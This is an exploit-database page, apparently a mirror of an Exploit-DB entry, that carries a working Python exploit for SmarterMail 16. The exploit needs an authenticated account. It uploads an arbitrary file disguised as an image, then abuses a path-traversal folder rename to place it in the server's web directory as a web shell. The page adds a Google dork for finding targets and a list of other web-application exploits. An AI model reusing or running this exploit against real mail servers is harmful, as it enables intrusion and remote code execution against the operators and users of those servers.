Search for hundreds of thousands of exploits

"SmarterMail 16 - Arbitrary File Upload"

Author

Exploit author

vvhack.org

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-06-12

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
# Exploit Title: SmarterMail 16 - Arbitrary File Upload
# Google Dork: inurl:/interface/root
# Date: 2020-06-10
# Exploit Author: vvhack.org
# Vendor Homepage: https://www.smartertools.com
# Software Link: https://www.smartertools.com
# Version: 16.x
# Tested on: Windows
# CVE : N/A

#!/usr/bin/python3
import requests, json, argparse
from requests_toolbelt.multipart.encoder import MultipartEncoder

#example usage:
#Authenticated
#python3 exp.py -w http://mail.site.com/ -f ast.aspx
#Change username & password !

class Tak:
 
  def __init__(self):
     self.file_upload()
     self.shell_upload()

  def loginned(self):
    self.urls = results.wbsn + '/api/v1/auth/authenticate-user'
    self.myobja = {"username":"mail@mail.com","password":"password","language":"en"}
    self.xx = requests.post(self.urls, data = self.myobja)
    self.data = json.loads(self.xx.text)
    self.das = self.data['accessToken']
    self.headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0', 'Authorization': "Bearer " + self.das}

  def loginned_folder(self):
    self.loginned()
    self.url = results.wbsn + '/api/v1/mail/messages'
    myobj = {"folder":"drafts","ownerEmailAddress":"","sortType":5,"sortAscending":"false","query":"","skip":0,"take":151,"selectedIds":[]}
    x = requests.post(self.url, data = myobj, headers=self.headers)
    print(x.text)

  def create_folder(self):
    self.loginned()
    self.urlz = results.wbsn + '/api/v1/filestorage/folder-put'
    myobj = {"folder": "testos1", "parentFolder":"Root Folder\\"}
    myobj2= {"folder": "testos2", "parentFolder":"Root Folder\\"}
    x = requests.post(self.urlz, data = myobj, headers=self.headers)
    x = requests.post(self.urlz, data = myobj2, headers=self.headers)
    print(x.text)

  def file_upload(self):
      self.create_folder()
      '''
      #resumableChunkNumber=1&
      #resumableChunkSize=2097152&resumableCurrentChunkSize=955319&resumableTotalSize=955319&
      #resumableType=image%2Fjpeg&resumableIdentifier=955319-112097jpg&resumableFilename=112097.jpg&
      #resumableRelativePath=112097.jpg&resumableTotalChunks=1", headers={'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
      #'Accept-Language': "en-US,en;q=0.5", 'Accept-Encoding': "gzip, deflate",
      #print(self.xz)
      #print(self.xz.headers)
      '''
      size = os.path.getsize(results.wbsf)
      print(size)
      replace_file = results.wbsf.replace(".","")
      with open(results.wbsf, "rb") as outf:
          contents = outf.read()
          multipart_data = MultipartEncoder(
          fields={
          "context": "file-storage",
          #"contextData": '{"folder":"Root Folder\\ " + str(results.wbsd) + "\\"}',
          "contextData": '{"folder":"Root Folder\\\\testos1\\\\"}',
          "resumableChunkNumber": "1",
          "resumableChunkSize": "2097152",
          "resumableCurrentChunkSize": str(size),
          "resumableTotalSize": str(size),
          "resumableType": "image/jpeg",
          #"resumableIdentifier": "955319-112097jpg",
          "resumableIdentifier": str(size) + "-" + str(replace_file),
          "resumableFilename": results.wbsf,
          "resumableRelativePath": results.wbsf,
          "resumableTotalChunks": "1",
          "file": (
              'blob',#112097.jpg',
               #open(file, "rb"),
               contents,
               #file,
               #"image/jpeg"
               "application/octet-stream"
               #'text/plain'
               )

        }
)
      '''    
      http_proxy = "http://127.0.0.1:8080"
      proxyDict = {
              "http"  : http_proxy,
            }
      '''      
      # if you want to activate intercept then add with that argument, this parameter is necessary requiresfunc(if you want to activate it, please remove it from the comment line.)  >> proxies=proxyDict
      self.dre = requests.post(url=results.wbsn + "/api/upload",headers={"Content-Type": multipart_data.content_type, 
      'Authorization': "Bearer " + self.das, 
      'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"},data=multipart_data) 

  def shell_upload(self):

   '''
   http_proxy = "http://127.0.0.1:8080"
   proxyDict = {
              "http"  : http_proxy,
   }
   '''

   json_data = {
           "folder": "Root Folder\\testos1\\",
           "newFolderName": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\program files (x86)\\SmarterTools\\SmarterMail\\MRS\\testos1\\",
           "parentFolder": "",
           "newParentFolder": "Root Folder\\testos2"
   }
   #r = requests.post('http://mail.site.com/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers, proxies=proxyDict)
   r = requests.post(results.wbsn+'/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers)
   print(results.wbsn + "/testos1/" + results.wbsf) 

if __name__ == '__main__':

   parser = argparse.ArgumentParser()
   parser.add_argument('-f', action='store', dest='wbsf',
                   help='Filename')
   parser.add_argument('-w', action='store', dest='wbsn',
                   help='Target')
   parser.add_argument('--version', action='version', version='SmartMail Knock Knock')
   results = parser.parse_args()

   tako = Tak()
   tako
Release DateTitleTypePlatformAuthor
2020-09-11"VTENEXT 19 CE - Remote Code Execution"webappsmultiple"Marco Ruela"
2020-09-11"Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)"webappsmultiplenepska
2020-09-07"Cabot 0.11.12 - Persistent Cross-Site Scripting"webappsmultiple"Abhiram V"
2020-08-28"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting"webappsmultiple"Jinson Varghese Behanan"
2020-08-27"Mida eFramework 2.9.0 - Remote Code Execution"webappsmultipleelbae
2020-08-26"Ericom Access Server x64 9.2.0 - Server-Side Request Forgery"webappsmultiplehyp3rlinx
2020-08-26"Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal"webappsmultipleLiquidWorm
2020-07-26"Socket.io-file 2.0.31 - Arbitrary File Upload"webappsmultipleCr0wTom
2020-07-26"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)"webappsmultiplebdrake
2020-07-26"Bio Star 2.8.2 - Local File Inclusion"webappsmultiple"SITE Team"
Release DateTitleTypePlatformAuthor
2020-06-12"SmarterMail 16 - Arbitrary File Upload"webappsmultiplevvhack.org
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48580/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.